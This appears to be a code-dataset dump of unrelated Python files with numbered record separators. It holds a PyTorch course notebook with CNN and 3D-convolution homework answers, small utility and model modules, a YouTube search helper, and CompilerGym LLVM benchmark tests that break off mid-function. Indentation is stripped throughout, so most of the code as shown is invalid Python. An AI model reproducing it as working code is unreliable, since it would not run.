# ### Testing the model and submit on Kaggle
# Testing the model on the testing set and save the results as a .csv file.
# Please submitted the results.csv file generated by predict_on_test() to Kaggle(https://www.kaggle.com/c/cse512springhw3) to see how well your network performs on the test set.
# #######5th To Do (submit the result to Kaggle,the highest 3 entries get extra 10 points )###############
#
# * Rank: 10
# * Score: 70.34658
# In[ ]:
# In[43]:
## Now we're going to feed a random batch into the model you defined and make sure the output is the right size
x = torch.randn(32, 3, 64, 64).type(dtype)
x_var = Variable(x.type(dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model(x_var) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
print(np.array(ans.size()))
np.array_equal(np.array(ans.size()), np.array([32, 10]))
# In[78]:
torch.random.manual_seed(54321)
fixed_model.cpu()
fixed_model.apply(reset)
fixed_model.train()
train(fixed_model, loss_fn, optimizer,image_dataloader_train, num_epochs=12)
check_accuracy(fixed_model, image_dataloader_train)# check accuracy on the training set
# In[79]:
check_accuracy(fixed_model, image_dataloader_val)# check accuracy on the training set
# ### Things you should try:
# - **Filter size**: Above we used 7x7; this makes pretty pictures but smaller filters may be more efficient
# - **Number of filters**: Do more or fewer do better?
# - **Pooling vs Strided Convolution**: Do you use max pooling or just stride convolutions?
# - **Batch normalization**: Try adding spatial batch normalization after convolution layers and vanilla batch normalization after affine layers. Do your networks train faster?
# - **Network architecture**: The network above has two layers of trainable parameters. Can you do better with a deep network? Good architectures to try include:
# - [conv-relu-pool]xN -> [affine]xM -> [softmax or SVM]
# - [conv-relu-conv-relu-pool]xN -> [affine]xM -> [softmax or SVM]
# - [batchnorm-relu-conv]xN -> [affine]xM -> [softmax or SVM]
# - **Global Average Pooling**: Instead of flattening and then having multiple affine layers, perform convolutions until your image gets small (7x7 or so) and then perform an average pooling operation to get to a 1x1 image picture (1, 1 , Filter#), which is then reshaped into a (Filter#) vector. This is used in [Google's Inception Network](https://arxiv.org/abs/1512.00567) (See Table 1 for their architecture).
# - **Regularization**: Add l2 weight regularization, or perhaps use Dropout.
#
# ### Tips for training
# For each network architecture that you try, you should tune the learning rate and regularization strength. When doing this there are a couple important things to keep in mind:
#
# - If the parameters are working well, you should see improvement within a few hundred iterations
# - Remember the coarse-to-fine approach for hyperparameter tuning: start by testing a large range of hyperparameters for just a few training iterations to find the combinations of parameters that are working at all.
# - Once you have found some sets of parameters that seem to work, search more finely around these parameters. You may need to train for more epochs.
# - You should use the validation set for hyperparameter search, and save your test set for evaluating your architecture on the best parameters as selected by the validation set.
#
# ### Going above and beyond
# If you are feeling adventurous there are many other features you can implement to try and improve your performance. You are **not required** to implement any of these; however they would be good things to try.
#
# - Alternative update steps: For the assignment we implemented SGD+momentum, RMSprop, and Adam; you could try alternatives like AdaGrad or AdaDelta.
# - Alternative activation functions such as leaky ReLU, parametric ReLU, ELU, or MaxOut.
# - Model ensembles
# - Data augmentation
# - New Architectures
# - [ResNets](https://arxiv.org/abs/1512.03385) where the input from the previous layer is added to the output.
# - [DenseNets](https://arxiv.org/abs/1608.06993) where inputs into previous layers are concatenated together.
# - [This blog has an in-depth overview](https://chatbotslife.com/resnets-highwaynets-and-densenets-oh-my-9bb15918ee32)
#
# If you do decide to implement something extra, clearly describe it in the "Extra Credit Description" cell below.
#
# ### What we expect
# At the very least, you should be able to train a ConvNet that gets at least 55% accuracy on the validation set. This is just a lower bound - if you are careful it should be possible to get accuracies much higher than that! Extra credit points will be awarded for particularly high-scoring models or unique approaches.
#
# You should use the space below to experiment and train your network.
#
#
# In[ ]:
train(fixed_model_base, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model, image_dataloader_val)
# ### GPU! (This part is optional, 0 points)
#
# If you have access to GPU, you can make the code run on GPU, it would be much faster.
#
# Now, we're going to switch the dtype of the model and our data to the GPU-friendly tensors, and see what happens... everything is the same, except we are casting our model and input tensors as this new dtype instead of the old one.
#
# If this returns false, or otherwise fails in a not-graceful way (i.e., with some error message), you may not have an NVIDIA GPU available on your machine.
# In[75]:
# Verify that CUDA is properly configured and you have a GPU available
torch.cuda.is_available()
# In[76]:
import copy
gpu_dtype = torch.cuda.FloatTensor
fixed_model_gpu = copy.deepcopy(fixed_model_base)#.type(gpu_dtype)
fixed_model_gpu.cuda()
x_gpu = torch.randn(4, 3, 64, 64).cuda()#.type(gpu_dtype)
x_var_gpu = Variable(x_gpu)#type(gpu_dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model_gpu(x_var_gpu) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
np.array_equal(np.array(ans.size()), np.array([4, 10]))
# Run the following cell to evaluate the performance of the forward pass running on the CPU:
# In[77]:
get_ipython().run_cell_magic('timeit', '', 'ans = fixed_model(x_var)')
# ... and now the GPU:
# In[78]:
get_ipython().run_cell_magic('timeit', '', 'torch.cuda.synchronize() # Make sure there are no pending GPU computations\nans = fixed_model_gpu(x_var_gpu) # Feed it through the model! \ntorch.cuda.synchronize() # Make sure there are no pending GPU computations')
# You should observe that even a simple forward pass like this is significantly faster on the GPU. So for the rest of the assignment (and when you go train your models in assignment 3 and your project!), you should use the GPU datatype for your model and your tensors: as a reminder that is *torch.cuda.FloatTensor* (in our notebook here as *gpu_dtype*)
# Let's make the loss function and training variables to GPU friendly format by '.cuda()'
# In[79]:
loss_fn = nn.CrossEntropyLoss().cuda()
optimizer = optim.RMSprop(fixed_model_gpu.parameters(), lr=1e-4)
# In[80]:
def train(model, loss_fn, optimizer, dataloader, num_epochs = 1):
for epoch in range(num_epochs):
print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
model.train()
check_accuracy(fixed_model_gpu, image_dataloader_val)# check accuracy on the training set
for t, sample in enumerate(dataloader):
x_var = Variable(sample['image'].cuda())
y_var = Variable(sample['Label'].cuda().long())
scores = model(x_var)
loss = loss_fn(scores, y_var)
if (t + 1) % print_every == 0:
print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
optimizer.zero_grad()
loss.backward()
optimizer.step()
def check_accuracy(model, loader):
'''
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
'''
num_correct = 0
num_samples = 0
model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
for t, sample in enumerate(loader):
x_var = Variable(sample['image'].cuda())
y_var = sample['Label'].cuda()
y_var=y_var.cpu()
scores = model(x_var)
_, preds = scores.data.cpu().max(1)
#print(preds)
#print(y_var)
num_correct += (preds.numpy() == y_var.numpy()).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('Got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
# Run on GPU!
# In[47]:
torch.cuda.random.manual_seed(873271)
fixed_model_gpu.apply(reset)
fixed_model_gpu.train()
train(fixed_model_gpu, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model_gpu, image_dataloader_train)# check accuracy on the training set
# In[48]:
check_accuracy(fixed_model_gpu, image_dataloader_val)# check accuracy on the training set
# In[46]:
def predict_on_test(model, loader):
'''
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
'''
num_correct = 0
num_samples = 0
model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
results=open('results.csv','w')
count=0
results.write('Id'+','+'Class'+'\n')
for t, sample in enumerate(loader):
x_var = Variable(sample['image'])
scores = model(x_var)
_, preds = scores.data.max(1)
for i in range(len(preds)):
results.write(str(count)+','+str(preds[i])+'\n')
count+=1
results.close()
return count
count=predict_on_test(fixed_model, image_dataloader_test)
print(count)
# ### 3D Convolution on video clips (25 points+10 extra points)
# 3D convolution is for videos, it has one more dimension than 2d convolution. You can find the document for 3D convolution here http://pytorch.org/docs/master/nn.html#torch.nn.Conv3dIn. In our dataset, each clip is a video of 3 frames. Lets classify the each clip rather than each image using 3D convolution.
# We offer the data loader, the train_3d and check_accuracy
# In[49]:
class ActionClipDataset(Dataset):
"""Action Landmarks dataset."""
def __init__(self, root_dir,labels=[], transform=None):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.root_dir = root_dir
self.transform = transform
self.length=len(os.listdir(self.root_dir))
self.labels=labels
def __len__(self):
return self.length
def __getitem__(self, idx):
folder=idx+1
folder=format(folder,'05d')
clip=[]
if len(self.labels)!=0:
Label=self.labels[idx][0]-1
for i in range(3):
imidx=i+1
imgname=str(imidx)+'.jpg'
img_path = os.path.join(self.root_dir,
folder,imgname)
image = Image.open(img_path)
image=np.array(image)
clip.append(image)
if self.transform:
clip=np.asarray(clip)
clip=np.transpose(clip, (0,3,1,2))
clip = torch.from_numpy(np.asarray(clip))
if len(self.labels)!=0:
sample={'clip':clip,'Label':Label,'folder':folder}
else:
sample={'clip':clip,'folder':folder}
return sample
clip_dataset=ActionClipDataset(root_dir='./data/trainClips/', labels=label_train,transform=T.ToTensor())#/home/tqvinh/Study/CSE512/cse512-s18/hw2data/trainClips/
for i in range(10):
sample=clip_dataset[i]
print(sample['clip'].shape)
print(sample['Label'])
print(sample['folder'])
# In[50]:
clip_dataloader = DataLoader(clip_dataset, batch_size=4,
shuffle=True, num_workers=4)
for i,sample in enumerate(clip_dataloader):
print(i,sample['clip'].shape,sample['folder'],sample['Label'])
if i>20:
break
# In[51]:
clip_dataset_train=ActionClipDataset(root_dir='./data/trainClips/',labels=label_train,transform=T.ToTensor())
clip_dataloader_train = DataLoader(clip_dataset_train, batch_size=16,
shuffle=True, num_workers=4)
clip_dataset_val=ActionClipDataset(root_dir='./data/valClips/',labels=label_val,transform=T.ToTensor())
clip_dataloader_val = DataLoader(clip_dataset_val, batch_size=16,
shuffle=True, num_workers=4)
clip_dataset_test=ActionClipDataset(root_dir='./data/testClips/',labels=[],transform=T.ToTensor())
clip_dataloader_test = DataLoader(clip_dataset_test, batch_size=16,
shuffle=False, num_workers=4)
# Write the Flatten for 3d covolution feature maps.
# In[52]:
class Flatten3d(nn.Module):
def forward(self, x):
###############6th To Do (5 points)###################
N, C, D, H, W = x.size() # read in N, C, D, H, W
return x.view(N, -1) # "flatten" the C * D * H * W values into a single vector per image
# Design a network using 3D convolution on videos for video classification.
# In[58]:
fixed_model_3d = nn.Sequential( # You fill this in!
###############7th To Do (16 points)#########################
nn.Conv3d(in_channels = 3, out_channels = 50, kernel_size = 2, stride = 1),
nn.ReLU(inplace=True),
nn.MaxPool3d((1, 2, 2), stride = 2),
nn.Conv3d(in_channels = 50, out_channels = 100, kernel_size = (1, 3, 3), stride = 1),
nn.ReLU(inplace = True),
nn.MaxPool3d((1, 3, 3), stride = 2),
nn.Dropout3d(0.1),
Flatten3d(),
nn.ReLU(inplace=True),
nn.Linear(19600, 10),
nn.LogSoftmax()
###############################
)
fixed_model_3d = fixed_model_3d.type(dtype)
x = torch.randn(32,3, 3, 64, 64).type(dtype)
x_var = Variable(x).type(dtype) # Construct a PyTorch Variable out of your input data
ans = fixed_model_3d(x_var)
np.array_equal(np.array(ans.size()), np.array([32, 10]))
#Accuracy 62 iterations 6
# ### Describe what you did (4 points)
#
# In the cell below you should write an explanation of what you did, any additional features that you implemented, and any visualizations or graphs that you make in the process of training and evaluating your network.
# 8th To Do
# Tell us here:
# * 2X2X2 Convolution layer with 50 filters
# * ReLU layer inplace True
# * Max Pooling layer with window size (1, 2, 2) stride = 2
# * 1X3X3 Convolution layer with 100 filters
# * ReLU layer with inplace True
# * Max Pooling layer with window size (1, 3, 3) stride = 2
# * dropout layer with penalty 0.1
# * flattening
# * ReLU layer with inplace True
# * Affine layer
# * LogSoftmax Layer
# In[59]:
loss_fn = nn.CrossEntropyLoss().type(dtype)
optimizer = optim.RMSprop(fixed_model_3d.parameters(), lr=1e-4)
# In[60]:
def train_3d(model, loss_fn, optimizer,dataloader,num_epochs = 1):
for epoch in range(num_epochs):
print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
check_accuracy_3d(fixed_model_3d, clip_dataloader_val)
model.train()
for t, sample in enumerate(dataloader):
x_var = Variable(sample['clip'].type(dtype))
y_var = Variable(sample['Label'].type(dtype).long())
scores = model(x_var)
loss = loss_fn(scores, y_var)
if (t + 1) % print_every == 0:
print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
optimizer.zero_grad()
loss.backward()
optimizer.step()
def check_accuracy_3d(model, loader):
'''
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
'''
num_correct = 0
num_samples = 0
model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
for t, sample in enumerate(loader):
x_var = Variable(sample['clip'].type(dtype))
y_var = sample['Label'].type(dtype)
y_var=y_var.cpu()
scores = model(x_var)
_, preds = scores.data.cpu().max(1)
#print(preds)
#print(y_var)
num_correct += (preds.numpy() == y_var.numpy()).sum()
num_samples += preds.size(0)
acc = float(num_correct) / num_samples
print('Got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
# In[61]:
torch.cuda.random.manual_seed(782374)
fixed_model_3d.apply(reset)
fixed_model_3d.train()
train_3d(fixed_model_3d, loss_fn, optimizer,clip_dataloader_train, num_epochs=5)
fixed_model_3d.eval()
check_accuracy_3d(fixed_model_3d, clip_dataloader_train)
check_accuracy_3d(fixed_model_3d, clip_dataloader_val)
# Test your 3d convolution model on the validation set. You don't need to submit the result of this part to kaggle.
# Test your model on the test set, predict_on_test_3d() will generate a file named 'results_3d.csv'. Please submit the csv file to kaggle https://www.kaggle.com/c/cse512springhw3video
# The highest 3 entries get extra 10 points.
#
# In[62]:
def predict_on_test_3d(model, loader):
'''
if loader.dataset.train:
print('Checking accuracy on validation set')
else:
print('Checking accuracy on test set')
'''
num_correct = 0
num_samples = 0
model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
results=open('results_3d.csv','w')
count=0
results.write('Id'+','+'Class'+'\n')
for t, sample in enumerate(loader):
x_var = Variable(sample['clip'].type(dtype))
scores = model(x_var)
_, preds = scores.data.max(1)
for i in range(len(preds)):
results.write(str(count)+','+str(preds[i])+'\n')
count+=1
results.close()
return count
count=predict_on_test_3d(fixed_model_3d, clip_dataloader_test)
print(count)
# * Rank on kaggle: 27
# * Score: 61.80428
# In[ ]:
|
996,871 | cf0ab04f13d89f1d9a214857e0ddf6d434343b55 | # file: intersect.py
"""
Measuring the time for searching in a list and a set including
creation time of the data structure.
"""
import timeit
from searching import compare
def intersect_list(n):
"""Measure the run time for intersecting two lists.
"""
list_a = range(n)
list_b = range(n-3, 2 * n)
start = timeit.default_timer()
in_both = []
for x in list_a:
if x in list_b:
in_both.append(x)
run_time = timeit.default_timer() - start
return run_time, in_both
def intersect_set(n):
"""Measure the run time for intersecting two setss.
"""
set_a = set(range(n))
set_b = set(range(n-3, 2 * n))
start = timeit.default_timer()
in_both = set_a.intersection(set_b)
run_time = timeit.default_timer() - start
return run_time, in_both
def calculate_intersect(n):
"""Calculate the intersecting time for two lists and two sets.
"""
list_time, list_result = intersect_list(n)
set_time, set_result = intersect_set(n)
assert set_result == set(list_result)
return list_time, set_time, list_time / set_time
if __name__ == '__main__':
compare(func=calculate_intersect, header='Intersection')
|
996,872 | a781d858c1e8c02c4bd691f9fe847fe576644d9a | from mongodm.base import BaseDocument
class Document(BaseDocument):
pass
class EmbeddedDocument(BaseDocument):
pass |
996,873 | 1edec8277868635625b27a27dd4f1a269c1df6c7 | from TrainOfHope import os, db
from datetime import datetime
class Event(db.Model):
__tablename__ = "events"
id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)
title = db.Column(db.Text,nullable=False)
location = db.Column(db.Text,nullable=False)
description = db.Column(db.Text, nullable=True)
date = db.Column(db.Date, nullable=True)
time = db.Column(db.Text, nullable=True)
competence = db.relationship("Competence", order_by="Competence.id", backref="events")
def __init__(self, title, location, description, date, time):
self.title = title
self.location = location
self.description = description
self.date = date
self.time = time
class Competence(db.Model):
__tablename__ = "competences"
id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)
needed_skill = db.Column(db.Text, nullable=False)
coming_skill = db.Column(db.Text, nullable=True)
event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False)
def __init__(self, needed_skill, coming_skill, event_id):
self.needed_skill = needed_skill
self.coming_skill = coming_skill
self.event_id = event_id
|
996,874 | 86e69cc691520d41209e9e3b1062ab281b93a296 | #! C:\Users\Gherardelli\Documents\PortableApps\WinPython\python-2.7.10\python.exe
'''
Define authentication and other basic functions for Twitter interaction
'''
import twitter, json, os
CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN = ""
ACCESS_SECRET = ""
def t_auth(consumer_key, consumer_secret, access_token, access_secret):
auth = twitter.oauth.OAuth(access_token, access_secret,
consumer_key, consumer_secret)
twitter_api = twitter.Twitter(auth=auth)
return twitter_api
def process(tweet):
print json.dumps(tweet, indent = 2)
t = t_auth(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_SECRET)
|
996,875 | 1362a720abe444302c291ca65723fee7189fd0be | import gdata.youtube
import gdata.youtube.service
from urlparse import parse_qs, urlsplit
from sciencecombinator.settings import YOUTUBE_SECRET_KEY
from science_combinator.models import AcceptedCategory
class YoutubeService(object):
def _is_valid_video(self, video, categories):
cat = video.media.category[0].text
for category in categories:
if cat.lower() in category.lower():
return True
return False
def search_videos(self, needle):
service = gdata.youtube.service.YouTubeService()
service.developer_key = YOUTUBE_SECRET_KEY
service.client_id = "Science Combinator"
query = gdata.youtube.service.YouTubeVideoQuery()
query.vq = needle
feed = service.YouTubeQuery(query)
categories = [cat.name for cat in AcceptedCategory.objects.all()]
videos = []
for entry in feed.entry:
if not self._is_valid_video(entry, categories):
continue
url = entry.media.player.url
qs = parse_qs(urlsplit(url).query)
video = {
"remote_id": qs["v"][0],
"title": entry.media.title.text,
"description": entry.media.description.text,
"category": entry.media.category[0].text,
"published": entry.published.text,
"thumbnail": entry.media.thumbnail[0].url,
"duration": entry.media.duration.seconds,
}
self._normalize(video)
videos.append(video)
return videos
def _normalize(self, video):
for key, value in video.iteritems():
try:
video[key] = value.encode("utf-8")
except:
video[key] = "" |
996,876 | 8e0af4d27d8355f231a4029ec90694e86405c0d5 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for LLVM benchmark handling."""
import re
import subprocess
import tempfile
from pathlib import Path
import gym
import pytest
from compiler_gym.datasets import Benchmark
from compiler_gym.envs import LlvmEnv, llvm
from compiler_gym.errors import BenchmarkInitError
from compiler_gym.service.proto import Benchmark as BenchmarkProto
from compiler_gym.service.proto import File
from compiler_gym.third_party import llvm as llvm_paths
from compiler_gym.util.runfiles_path import runfiles_path
from compiler_gym.util.temporary_working_directory import temporary_working_directory
from tests.pytest_plugins.common import bazel_only
from tests.test_main import main
pytest_plugins = ["tests.pytest_plugins.llvm"]
# The path of an IR file that assembles but does not compile.
INVALID_IR_PATH = runfiles_path("tests/llvm/invalid_ir.ll")
EXAMPLE_BITCODE_FILE = runfiles_path(
"compiler_gym/third_party/cbench/cbench-v1/crc32.bc"
)
EXAMPLE_BITCODE_IR_INSTRUCTION_COUNT = 242
def test_reset_invalid_benchmark(env: LlvmEnv):
invalid_benchmark = "an invalid benchmark"
with pytest.raises(
LookupError, match=f"Dataset not found: benchmark://{invalid_benchmark}"
):
env.reset(benchmark=invalid_benchmark)
def test_invalid_benchmark_data(env: LlvmEnv):
benchmark = Benchmark.from_file_contents(
"benchmark://new", "Invalid bitcode".encode("utf-8")
)
with pytest.raises(
BenchmarkInitError, match='Failed to parse LLVM bitcode: "benchmark://new"'
):
env.reset(benchmark=benchmark)
def test_invalid_benchmark_missing_file(env: LlvmEnv):
benchmark = Benchmark(
BenchmarkProto(
uri="benchmark://new",
)
)
with pytest.raises(ValueError, match="No program set"):
env.reset(benchmark=benchmark)
def test_benchmark_path_empty_file(env: LlvmEnv):
with tempfile.TemporaryDirectory() as tmpdir:
tmpdir = Path(tmpdir)
(tmpdir / "test.bc").touch()
benchmark = Benchmark.from_file("benchmark://new", tmpdir / "test.bc")
with pytest.raises(BenchmarkInitError, match="Failed to parse LLVM bitcode"):
env.reset(benchmark=benchmark)
def test_invalid_benchmark_path_contents(env: LlvmEnv):
with tempfile.TemporaryDirectory() as tmpdir:
tmpdir = Path(tmpdir)
with open(str(tmpdir / "test.bc"), "w") as f:
f.write("Invalid bitcode")
benchmark = Benchmark.from_file("benchmark://new", tmpdir / "test.bc")
with pytest.raises(BenchmarkInitError, match="Failed to parse LLVM bitcode"):
env.reset(benchmark=benchmark)
def test_benchmark_path_invalid_scheme(env: LlvmEnv):
benchmark = Benchmark(
BenchmarkProto(
uri="benchmark://new", program=File(uri="invalid_scheme://test")
),
)
with pytest.raises(
ValueError,
match=(
"Invalid benchmark data URI. "
'Only the file:/// scheme is supported: "invalid_scheme://test"'
),
):
env.reset(benchmark=benchmark)
def test_custom_benchmark(env: LlvmEnv):
benchmark = Benchmark.from_file("benchmark://new", EXAMPLE_BITCODE_FILE)
env.reset(benchmark=benchmark)
assert env.benchmark == "benchmark://new"
def test_custom_benchmark_constructor():
benchmark = Benchmark.from_file("benchmark://new", EXAMPLE_BITCODE_FILE)
with gym.make("llvm-v0", benchmark=benchmark) as env:
env.reset()
assert env.benchmark == "benchmark://new"
def test_make_benchmark_single_bitcode(env: LlvmEnv):
benchmark = llvm.make_benchmark(EXAMPLE_BITCODE_FILE)
assert benchmark == f"benchmark://file-v0{EXAMPLE_BITCODE_FILE}"
assert benchmark.uri.scheme == "benchmark"
assert benchmark.uri.dataset == "file-v0"
with open(EXAMPLE_BITCODE_FILE, "rb") as f:
contents = f.read()
assert benchmark.proto.program.contents == contents
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
assert env.observation["IrInstructionCount"] == EXAMPLE_BITCODE_IR_INSTRUCTION_COUNT
@bazel_only
def test_make_benchmark_single_ll():
"""Test passing a single .ll file into make_benchmark()."""
benchmark = llvm.make_benchmark(INVALID_IR_PATH)
assert str(benchmark.uri).startswith("benchmark://user-v0/")
assert benchmark.uri.scheme == "benchmark"
assert benchmark.uri.dataset == "user-v0"
def test_make_benchmark_single_clang_job(env: LlvmEnv):
with tempfile.TemporaryDirectory() as d:
source = Path(d) / "input.c"
with open(str(source), "w") as f:
f.write("int A() { return 0; }")
benchmark = llvm.make_benchmark(str(source))
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
print(env.observation["Ir"])
assert re.search(r"define (dso_local )?i32 @A\(\)", env.observation["Ir"])
def test_make_benchmark_split_clang_job(env: LlvmEnv):
with tempfile.TemporaryDirectory() as d:
source_1 = Path(d) / "a.c"
source_2 = Path(d) / "b.c"
with open(str(source_1), "w") as f:
f.write("int B() { return A(); }")
with open(str(source_2), "w") as f:
f.write("int A() { return 0; }")
benchmark = llvm.make_benchmark(
[
str(source_1),
str(source_2),
]
)
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
print(env.observation["Ir"])
assert re.search(r"define (dso_local )?i32 @A\(\)", env.observation["Ir"])
assert re.search(r"define (dso_local )?i32 @B\(\)", env.observation["Ir"])
def test_make_benchmark_single_clang_invocation_multiple_inputs():
with tempfile.TemporaryDirectory() as d:
source_1 = Path(d) / "a.c"
source_2 = Path(d) / "b.c"
with open(str(source_1), "w") as f:
f.write("int B() { return A(); }")
with open(str(source_2), "w") as f:
f.write("int A() { return 0; }")
# cannot specify -o when generating multiple output files
with pytest.raises(OSError):
llvm.make_benchmark(llvm.ClangInvocation([str(source_1), str(source_2)]))
def test_make_benchmark_undefined_symbol(env: LlvmEnv):
with tempfile.TemporaryDirectory() as d:
source = Path(d) / "a.c"
with open(str(source), "w") as f:
f.write("int main() { return A(); }")
benchmark = llvm.make_benchmark(source)
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
print(env.observation["Ir"])
assert re.search(r"declare (dso_local )?i32 @A\(\.\.\.\)", env.observation["Ir"])
def test_make_benchmark_missing_file():
with tempfile.TemporaryDirectory() as d:
with pytest.raises(FileNotFoundError):
llvm.make_benchmark(Path(d) / "a.c")
with pytest.raises(FileNotFoundError):
llvm.make_benchmark(str(Path(d) / "a.c"))
def test_make_benchmark_unrecognized_file_type():
with tempfile.TemporaryDirectory() as d:
path = Path(d) / "foo.txt"
path.touch()
with pytest.raises(ValueError, match=r"Unrecognized file type"):
llvm.make_benchmark(path)
def test_make_benchmark_clang_job_standard_libraries(env: LlvmEnv):
with tempfile.TemporaryDirectory() as d:
source = Path(d) / "input.cc"
with open(str(source), "w") as f:
f.write('#include <stdio.h>\nint A() { printf(""); return 0; }')
benchmark = llvm.make_benchmark(str(source))
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
print(env.observation["Ir"])
assert re.search(r"define (dso_local )?i32 @_Z1Av\(\)", env.observation["Ir"])
assert re.search(r"declare (dso_local )?i32 @printf", env.observation["Ir"])
def test_make_benchmark_invalid_clang_job():
with pytest.raises(OSError, match="Compilation job failed with returncode"):
llvm.make_benchmark(llvm.ClangInvocation(["-invalid-arg"]))
def test_custom_benchmark_is_added_on_service_restart(env: LlvmEnv):
# When the service is restarted, the environment still uses the same custom
# benchmark.
with tempfile.TemporaryDirectory() as d:
source = Path(d) / "a.c"
with open(str(source), "w") as f:
f.write("int main() { return 0; }")
benchmark = llvm.make_benchmark(source)
env.reset(benchmark=benchmark)
assert env.benchmark == benchmark.uri
# Kill the service so that the next call to reset() starts a new one.
env.close()
assert env.service is None
env.reset()
assert env.benchmark == benchmark.uri
def test_two_custom_benchmarks_reset(env: LlvmEnv):
with tempfile.TemporaryDirectory() as d:
source = Path(d) / "a.c"
with open(str(source), "w") as f:
f.write("int main() { return 0; }")
benchmark1 = llvm.make_benchmark(source)
benchmark2 = llvm.make_benchmark(source)
assert benchmark1.uri != benchmark2.uri
env.reset(benchmark=benchmark1)
assert env.benchmark == benchmark1.uri
env.reset()
assert env.benchmark == benchmark1.uri
with pytest.warns(
UserWarning,
match=r"Changing the benchmark has no effect until reset\(\) is called",
):
env.benchmark = benchmark2
env.reset()
assert env.benchmark == benchmark2.uri
def test_failing_build_cmd(env: LlvmEnv, tmpdir):
"""Test that reset() raises an error if build command fails."""
(Path(tmpdir) / "program.c").touch()
benchmark = env.make_benchmark(Path(tmpdir) / "program.c")
benchmark.proto.dynamic_config.build_cmd.argument.extend(
["$CC", "$IN", "-invalid-cc-argument"]
)
benchmark.proto.dynamic_config.build_cmd.timeout_seconds = 10
with pytest.raises(
BenchmarkInitError,
match=r"clang: error: unknown argument: '-invalid-cc-argument'",
):
env.reset(benchmark=benchmark)
def test_make_benchmark_from_command_line_empty_input(env: LlvmEnv):
with pytest.raises(ValueError, match="Input command line is empty"):
env.make_benchmark_from_command_line("")
with pytest.raises(ValueError, match="Input command line is empty"):
env.make_benchmark_from_command_line([])
@pytest.mark.parametrize("cmd", ["gcc", ["gcc"]])
def test_make_benchmark_from_command_line_insufficient_args(env: LlvmEnv, cmd):
with pytest.raises(ValueError, match="Input command line 'gcc' is too short"):
env.make_benchmark_from_command_line(cmd)
@pytest.mark.parametrize("cmd", ["gcc in.c -o foo", ["gcc", "in.c", "-o", "foo"]])
def test_make_benchmark_from_command_line_build_cmd(env: LlvmEnv, cmd):
with temporary_working_directory() as cwd:
with open("in.c", "w") as f:
f.write("int main() { return 0; }")
bm = env.make_benchmark_from_command_line(cmd, system_includes=False)
assert bm.proto.dynamic_config.build_cmd.argument[:4] == [
str(llvm_paths.clang_path()),
"-xir",
"$IN",
"-o",
]
assert bm.proto.dynamic_config.build_cmd.argument[-1].endswith(f"{cwd}/foo")
@pytest.mark.parametrize("cmd", ["gcc in.c -o foo", ["gcc", "in.c", "-o", "foo"]])
def test_make_benchmark_from_command_line(env: LlvmEnv, cmd):
with temporary_working_directory() as cwd:
with open("in.c", "w") as f:
f.write("int main() { return 0; }")
bm = env.make_benchmark_from_command_line(cmd)
assert not (cwd / "foo").is_file()
env.reset(benchmark=bm)
assert "main()" in env.ir
assert (cwd / "foo").is_file()
(cwd / "foo").unlink()
bm.compile(env)
assert (cwd / "foo").is_file()
def test_make_benchmark_from_command_line_no_system_includes(env: LlvmEnv):
with temporary_working_directory():
with open("in.c", "w") as f:
f.write(
"""
#include <stdio.h>
int main() { return 0; }
"""
)
with pytest.raises(BenchmarkInitError, match="stdio.h"):
env.make_benchmark_from_command_line("gcc in.c", system_includes=False)
def test_make_benchmark_from_command_line_system_includes(env: LlvmEnv):
with temporary_working_directory():
with open("in.c", "w") as f:
f.write(
"""
#include <stdio.h>
int main() { return 0; }
"""
)
env.make_benchmark_from_command_line("gcc in.c")
def test_make_benchmark_from_command_line_stdin(env: LlvmEnv):
with pytest.raises(ValueError, match="Input command line reads from stdin"):
env.make_benchmark_from_command_line(["gcc", "-xc", "-"])
@pytest.mark.parametrize("retcode", [1, 5])
def test_make_benchmark_from_command_line_multiple_input_sources(
env: LlvmEnv, retcode: int
):
"""Test that command lines with multiple source files are linked together."""
with temporary_working_directory() as cwd:
with open("a.c", "w") as f:
f.write("int main() { return B(); }")
with open("b.c", "w") as f:
f.write(f"int B() {{ return {retcode}; }}")
bm = env.make_benchmark_from_command_line(["gcc", "a.c", "b.c", "-o", "foo"])
assert not (cwd / "foo").is_file()
env.reset(benchmark=bm)
assert "main()" in env.ir
bm.compile(env)
assert (cwd / "foo").is_file()
p = subprocess.Popen(["./foo"])
p.communicate(timeout=60)
assert p.returncode == retcode
@pytest.mark.parametrize("retcode", [1, 5])
def test_make_benchmark_from_command_line_mixed_source_and_object_files(
env: LlvmEnv, retcode: int
):
